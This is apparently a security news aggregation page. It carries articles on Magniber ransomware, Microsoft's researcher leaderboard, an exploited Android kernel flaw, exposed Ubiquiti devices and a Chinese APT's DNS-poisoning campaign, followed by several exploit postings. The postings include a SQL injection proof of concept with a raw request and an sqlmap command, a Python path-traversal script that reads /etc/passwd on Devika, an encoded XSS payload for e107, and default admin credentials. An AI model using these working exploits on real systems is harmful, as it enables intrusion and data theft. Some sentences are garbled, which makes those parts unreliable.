Home users are being targeted by a ransomware called Magniber which locks up files and demands money for the key.

If you’ve been following any news about ransomware, you may be under the impression that ransomware groups are only after organizations rather than individual people, and for the most part that’s true.

However, Magniber is one ransomware that does target home users. And it’s back, with full force, demanding four figure ransoms to unencrypt data.

BleepingComputer, which has a dedicated forum for ransomware victims, reports:

> “A massive Magniber ransomware campaign is underway, encrypting home users’ devices worldwide and demanding thousand-dollar ransoms to receive a decryptor.”

This surge was confirmed by ID-Ransomware, which helps users to identify the ransomware family that has infected their systems. ID-Ransomware has received well over 700 requests from visitors who had their files encrypted by Magniber since July 20, 2024. Malwarebytes’ telemetry also shows an uptick in Magniber detections in July.

Magniber first emerged in 2017 when it 2024 targeted South Korean systems. In 2018, it started infecting computers with a much more developed version which also targeted other Asian countries like Malaysia, Taiwan, and Hong Kong.

The new campaign does not limit itself to specific regions and uses tried and trusted methods to reach home users’ systems. The ransomware is often disguised in downloads for cracks or key generators of popular software, as well as fake updates for Windows or browsers. In some cases, the group takes advantage of unpatched Windows vulnerabilities.

When infected, victims are presented with this ransom notice:

> Your important files have been encrypted due to the suspicion of the illegal content download!
> 
> Your files are not damaged! Your files are modified only. This modification is reversible.
> 
> Any attempts to restore your files with the third party software will be fatal to your files!
> 
> To receive the private key and decryption program follow the instructions below:

The instructions will tell you to visit a website which can only be reached by using the Tor browser.

Once the ransomware has encrypted the targeted files, it will typically request a ransom in the region of $1,000 which is raised to around $5,000 if the victim does not pay within three days. Unfortunately, old decryptors that were available for free don’t work for this version.

**How home users can prevent ransomware**

There are some rules that can help you avoid falling victim to this type of ransomware:

*   Make sure your system and software are on the latest version. Criminals will exploit known holes that have been patched by the vendors but not updated everywhere.
*   Run a trusted anti-malware solution.
*   Never download illegal software, cracks, and key generators.
*   Use a malicious content blocker to stop your browser from visiting bad sites.
*   Don’t open unexpected email attachments.
*   Don’t click on links before checking where they will take you.

If you do accidentally get caught by ransomware, we recommend you don’t pay. There’s no guarantee you’ll get your files back, and you’ll be helping to line the pockets of criminals.

Malwarebytes Artificial Intelligence module blocks the latest Magniber versions as Malware.AI.{ID-nr}. Older versions will be detected as Ransom.Magniber or Ransom.Magniber.Generic.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Magniber ransomware targets home users 

The Microsoft Researcher Recognition Program offers public thanks and recognition to security researchers who help protect our customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure.
Today, we are excited to recognize this year’s 100 Most Valuable Researchers (MVRs), based on the total number of points earned for each valid report.

The Microsoft Researcher Recognition Program offers public thanks and recognition to security researchers who help protect our customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure.

Today, we are excited to recognize this year’s 100 Most Valuable Researchers (MVRs), based on the total number of points earned for each valid report.  

**Congratulations to each of our MSRC 2024 Most Valuable Researchers!  **

Below is the Top 10 for the MSRC’s Annual Top 100 MVRs. Check out the full list of researchers recognized this year here.  

MSRC partners with thousands of researchers throughout the year. This list recognizes the 100 researchers who earned the most points this year by submitting valid vulnerabilities between July 1, 2023, and June 30, 2024.  

We thank you for your partnership and look forward to seeing you climb the ranking!

To learn more about our program scope and how to earn points for each valid vulnerability, check out our program page.

**Technical Leaderboards**

In addition to our top 100 leaderboard, our annual technology area-specific leaderboards recognize researchers who have submitted high-impact vulnerabilities in particular product areas.  

Annual Technical Leaderboards are not limited to the Top 100 and will feature all the Top 10 researchers in each technical group regardless of MVR status.

Congratulations to the top Azure researchers this year: **Yuki Chen, Wei, VictorV**!

Congratulations to the top Office researchers this year: **The Slyfer, Anonymous working with Trend Micro Zero Day Initiative, Harun Can**!

Congratulations to the top Windows researchers this year: **Yuki Chen, Wei, wkai**!

Congratulations to the top Dynamics 365 researchers this year: **Erik Donker, Dhiral Patel, Niraj Mahajan**!

**MVR Badges  **

In addition to MVR status, researchers are awarded badges to represent the following achievements:

Accuracy - recognizes researchers with 100% accuracy, meaning all their submissions were valid vulnerability reports

Impact - recognizes high-impact work, with the average points per valid vulnerability report at or above the 90th percentile

Volume - recognizes a larger body of work, requiring at least five valid vulnerability reports

Annual Technical Leaderboards will display Top 100 MVR badges where applicable.

**Swag**

Our 2024 100 MVRs will receive an MSRC swag box and digital badges to share their accomplishments on social media and professional portfolios. Researchers will be receiving an email from msrcmvr@microsoft.com in the coming month to claim their swag and badges.

Congratulations to each of the researchers recognized and thank you for continuing to partner with us to secure customers. We’re excited to see what you do in the next year!

_Madeline Eckert, MSRC_

Congratulations to the MSRC 2024 Most Valuable Security Researchers! 

Google has addressed a high-severity security flaw impacting the Android kernel that it has been actively exploited in the wild.
The vulnerability, tracked as CVE-2024-36971, has been described as a case of remote code execution impacting the kernel.
"There are indications that CVE-2024-36971 may be under limited, targeted exploitation," the tech giant noted in its monthly Android security

Mobile Security / Vulnerability

Google has addressed a high-severity security flaw impacting the Android kernel that it has been actively exploited in the wild.

The vulnerability, tracked as CVE-2024-36971, has been described as a case of remote code execution impacting the kernel.

"There are indications that CVE-2024-36971 may be under limited, targeted exploitation," the tech giant noted in its monthly Android security bulletin for August 2024.

As is typically the case, the company did not share any additional specifics on the nature of the cyber-attacks exploiting the flaw or attribute the activity to a particular threat actor or group. It's currently not known if Pixel devices are also impacted by the bug.

That said, Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the flaw, suggesting that it's likely being exploited by commercial spyware vendors to infiltrate Android devices in narrowly targeted attacks.

The August patch addresses a total of 47 flaws, including those identified in components associated with Arm, Imagination Technologies, MediaTek, and Qualcomm.

Also resolved by Google are 12 privilege escalation flaws, one information disclosure bug, and one denial-of-service (DoS) flaw impacting the Android Framework.

In June 2024, the search company revealed that an elevation of privilege issue in Pixel Firmware (CVE-2024-32896) has been exploited as part of limited and targeted attacks.

Google subsequently told The Hacker News that the issue's impact goes beyond Pixel devices to include the broader Android platform and that it's working with OEM partners to apply the fixes where applicable.

Previously, the company also closed out two security flaws in the bootloader and firmware components (CVE-2024-29745 and CVE-2024-29748) that were weaponized by forensic companies to steal sensitive data.

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2018-0824, a remote code execution flaw impacting Microsoft COM for Windows to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply fixes by August 26, 2024.

The addition follows a report from Cisco Talos that the flaw was weaponized by a Chinese nation-state threat actor named APT41 in a cyber attack aimed at an unnamed Taiwanese government-affiliated research institute to achieve local privilege escalation.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Patches New Android Kernel Vulnerability Exploited in the Wild

In the cloud, patches disseminate automatically. On your computer, you get notified. IoT devices, meanwhile, can escape attention for years on end.

Source: Nirbokphoto.com via Alamy Stock Photo

Tens of thousands of small office/home office (SOHO) devices sold by Ubiquiti Inc. are vulnerable on the open Internet to a five-year-old bug, researchers are warning.

In January 2019, broadband Internet expert Jim Troutman warned that an exposed port in dozens of Ubiquiti Internet of Things (IoT) gadgets was being exploited in denial-of-service (DoS) attacks. The underlying vulnerability, CVE-2017-0938, was assigned a "high" 7.5 score on the CVSS scale.

Seven months after that, researchers from Rapid7 were still able to find nearly 500,000 vulnerable devices. And now, even though Ubiquiti has long since acknowledged and patched the issue, around 20,000 devices remain vulnerable, Check Point Research noted in a new blog post.

"We can see that some of them were compromised," says Radoslaw Madej, vulnerability research team leader at Check Point Software. "Also, I've only done pretty rudimentary fingerprinting of the devices. It's quite possible that there are more of them \[compromised\] too."

Check Point also warned that besides being used in a SOHO botnet for DoS attack amplification, compromised devices can leak potentially sensitive data, too.

**Exposed Cameras & Routers Can Leak Data**

In probing Ubiquiti gadgets like the G4 Instant Camera — an Internet-enabled camera with two-way audio — Check Point homed in on port 10001, where the exposed process was first identified five years ago. The service at issue: Ubiquiti's discovery protocol, used to communicate between the device and its CloudKey+ controller.

Using spoofed packets, the Check Point researchers discovered that communicating with neither the CloudKey+ nor its connected devices required any sort of authentication. Further, the messages they received in response to their pings included specific information about the devices, plus their owners' names and locations.

"In a few instances, actually, there was a first name and the last name of a person, and what turned out to be a location where a Ubiquiti router was located," Madej recalls. "All this information … it took only one packet from me to receive that response.

"If I wanted to attack this entity, it would be easy for me, knowing the type of router they have, the name of the person, the exact software version, and their business address. \[I could\] find their contact details, and call them up saying: 'Hey, I'm calling from your Internet provider. I need to do some maintenance work. Provide me with access to the admin panel.' Because I can validate myself to this person by giving them all the information they need."

**The Issue with IoT**

Patched Ubiquiti products have a safeguard against Internet-based attacks: They do not respond to pings coming from the wider Web, only from internal IP addresses.

Despite the easy availability of such a simple fix, tens of thousands affected products in the wild remain unpatched. This seems to have a lot less to do with Ubiquiti itself than IoT security in general.

"We got used to patching our Windows machines and MacBooks and mobile phones and whatnot, but we're still not really used to the fact that we should also take care about our IoT devices, be it Wi-Fi routers, cameras, vacuum cleaners, fridges, and washing machines," Madej says.

"Of course," he adds, "the question is: To what extent an end user should even be bothered about it. We live in a time when all devices should have automatic updates enabled by default. I don't think that should be a concern of the end user."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

20K Ubiquiti IoT Cameras &amp; Routers Are Sitting Ducks for Hackers

The APT used DNS poisoning to install the Macma backdoor on targeted networks and then deliver malware to steal data via post-exploitation activity.

Source: Pawel Opaska via Alamy Stock Photo

Researchers have found that a China-linked advanced persistent threat (APT) group compromised an Internet service provider (ISP) to exploit software vendor update mechanisms using DNS poisoning. The attacks delivered new variants of the Macma backdoor, as well as post-exploitation malware to exfiltrate sensitive data from compromised networks.

Researchers at Volexity discovered the attack by Evasive Panda, a threat group they track as StormBamboo and that also goes by DaggerFly, when they detected multiple systems becoming infected with malware in mid-2023, they revealed in a recent blog post. The researchers eventually tracked the attacks to the highly active Chinese APT, which they found altering DNS query responses for specific domains tied to automatic software update channels for software vendors, they said.

"StormBamboo appeared to target software that used insecure update mechanisms, such as HTTP, and did not properly validate digital signatures of installers," Volexity researchers Ankur Saini, Paul Rascagneres, Steven Adair, and Thomas Lancaster wrote in the post. "Therefore, when these applications went to retrieve their updates, instead of installing the intended update, they would install malware, including but not limited to Macma and Pocostick (aka MGBot)."

Macma is a backdoor that's often used by Evasive Panda and was first detailed by Google TAG in 2021, though it was used for a number of years before discovery. The latest variant demonstrates the group converging development of both Macma and Gimmick MacOS malware, according to Volexity. The researchers also detected post-exploitation activity to deploy the malicious browser extension Reloadext to exfiltrate victim mail data, they said.

**Poisoning DNS Requests**

Volexity outlined one of several incidents that researchers investigated in which Evasive Panda used DNS poisoning to deliver malware via an HTTP automatic update mechanism. The attack poisoned responses for legitimate hostnames that were then used as second-stage command-and-control (C2) servers, the researchers said.

DNS poisoning is a type of DNS abuse in which an attacker poisons DNS records to reroute network communications to a server under their control to steal and manipulate information transmitted to users. In this case, the APT used the poisoned DNS records to resolve to an attacker-controlled server in Hong Kong at IP address 103.96.130.107, which was at the ISP level of the targeted organization.

The logic behind the abuse of automatic updates is the same for all the applications targeted, the researchers noted. The legitimate application performs an HTTP request to retrieve a text-based file containing the latest application version and a link to the installer.

"Since the attacker has control of the DNS responses for any given DNS name, they abuse this design, redirecting the HTTP request to a C2 server they control hosting a forged text file and a malicious installer," the researchers wrote.

In the attacks, the APT targeted multiple software vendors with "insecure update workflows" that use varying levels of complexity in their steps for pushing malware. For example, one of the vendors, 5Kplayer, uses a workflow, the binary of which automatically checks if a new version of YoutubeDL is available for each time the application is started.

If a new version is available, the process downloads it from the specified URL, and then the legitimate app executes it. In its attack, Evasive Panda used DNS poisoning to host a modified config file indicating a new update was available, which resulted in the YoutubeDL software downloading an upgrade package from the APT's server that had already been backdoored with malicious code.

**Beware: "Highly Skilled" APT at Work**

Volexity notified and worked with the ISP whose network was being used for DNS poisoning. The ISP investigated and took various network components offline, which stopped the malicious activity, the researchers said.

"During this time, it was not possible to pinpoint a specific device that was compromised, but various components of the infrastructure were updated or left offline and the activity ceased," they wrote.

The attacks are not the first time Evasive Panda, which often targets organizations across Asia that are interested in the Chinese state, has leveraged legit software update channels for nefarious purposes.

In April of last year, researchers from ESET discovered cyberespionage attacks in which the group targeted individuals in China and Nigeria by hijacking update channels for software developed by Chinese companies to deliver the MGBot malware to steal credentials and data.

Indeed, the group is "a highly skilled and aggressive threat actor" that often "compromises third parties to breach intended targets," the researchers warned.

"The variety of malware employed in various campaigns by this threat actor indicates significant effort is invested, with actively supported payloads for not only macOS and Windows, but also network appliances," they wrote.

The attacks also are related to previous research by ESET concerning the infection vector for the Pocostick malware that also used DNS poisoning to abuse automatic updates, as well as one used by a related APT DriftingBamboo following zero-day exploitation of Sophos firewalls, the researchers noted.

Volexity included a link to various rules and indicators of compromise (IOCs) in its post to help organizations detect if they have been affected by the malicious activity.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

China's Evasive Panda Attacks ISP to Send Malicious Software Updates

Online Shopping Portal Project version 2.0 suffers from a remote SQL injection vulnerability.

    [x]========================================================================================================================================[x] | Title        : Online Shopping Portal Project 2.0 SQL Vulnerabilities | Software     : Online Shopping Portal Project | Create By    : https://phpgurukul.com/author/anujk305/ | Version  : V 2.0 | Last Updated  : 06 June 2024 | Download     : https://phpgurukul.com/shopping-portal-free-download/ | Date         : 03 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology  : PHP | Database  : MySQL | Price  : FREE | Description  : E-commerce means any transaction over the internet.[x]========================================================================================================================================[x][O] Exploit    http://127.0.0.1/shopping/order-details.php [email parameter]  http://127.0.0.1/shopping/order-details.php [orderid parameter]    [O] Proof of concept    create an account and order one of the items, then track your order.  sqlmap.py "YOU RAW DATA" --dbs  [SQL]  POST /shopping/order-details.php HTTP/1.1  Host: 127.0.0.1  Content-Length: 42  Cache-Control: max-age=0  sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"  sec-ch-ua-mobile: ?0  sec-ch-ua-platform: "Windows"  Accept-Language: en-US  Upgrade-Insecure-Requests: 1  Origin: http://127.0.0.1  Content-Type: application/x-www-form-urlencoded  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  Sec-Fetch-Site: same-origin  Sec-Fetch-Mode: navigate  Sec-Fetch-User: ?1  Sec-Fetch-Dest: document  Referer: http://127.0.0.1/shopping/track-orders.php  Accept-Encoding: gzip, deflate, br  Cookie: auth-token-secret=ce668e880e958286436c06776b331b4b; auth-token=cc6dae05ce833672d48f461769dcd56c; PHPSESSID=qnae9mjoqfs22v54k55e1bt1hh  Connection: keep-alive  orderid=1&email=vrs_hck@maho.id&submit=    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

Online Shopping Portal Project 2.0 SQL Injection

Genexus Protection Server version 9.7.2.10 suffers from an unquoted service path vulnerability.

    #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path#Exploit Author : SamAlucard#Exploit Date: 2024-07-31#Vendor : Genexus#Version : Genexus Protection Server 9.7.2.10#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;#Vendor Homepage :  https://www.genexus.com/es/#Tested on OS: Windows 10 Pro#Analyze PoC :==============C:\>sc qc protsrvservice[SC] QueryServiceConfig CORRECTONOMBRE_SERVICIO: protsrvservice        TIPO               : 10  WIN32_OWN_PROCESS        TIPO_INICIO        : 2   AUTO_START        CONTROL_ERROR      : 1   NORMAL        NOMBRE_RUTA_BINARIO: C:\Program Files(x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe        GRUPO_ORDEN_CARGA  :        ETIQUETA           : 0        NOMBRE_MOSTRAR     : ProtSrvService        DEPENDENCIAS       : RPCSS        NOMBRE_INICIO_SERVICIO: LocalSystem

Genexus Protection Server 9.7.2.10 Unquoted Service Path

Devika version 1 suffers from a path traversal vulnerability.

    # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter# Google Dork: N/A# Date: 2024-06-29# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/X)# Vendor Homepage: https://devikaai.co/# Software Link: https://github.com/stitionai/devika# Version: v1# Tested on: Windows 11 Home Edition# CVE: CVE-2024-40422#!/usr/bin/pythonimport argparseimport requestsdef exploit(target_url):    url = f'http://{target_url}/api/get-browser-snapshot'    params = {        'snapshot_path': '../../../../etc/passwd'    }    response = requests.get(url, params=params)    print(response.text)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)    args = parser.parse_args()    exploit(args.target)

Devika 1 Path Traversal

e107 version 2.3.3 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : e107 v2.3.3 XSS Vulnerability                                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1[+] LOgin : http://127.0.0.1/233/e107_admin/[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

e107 2.3.3 Cross Site Scripting

Codeprojects E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#windows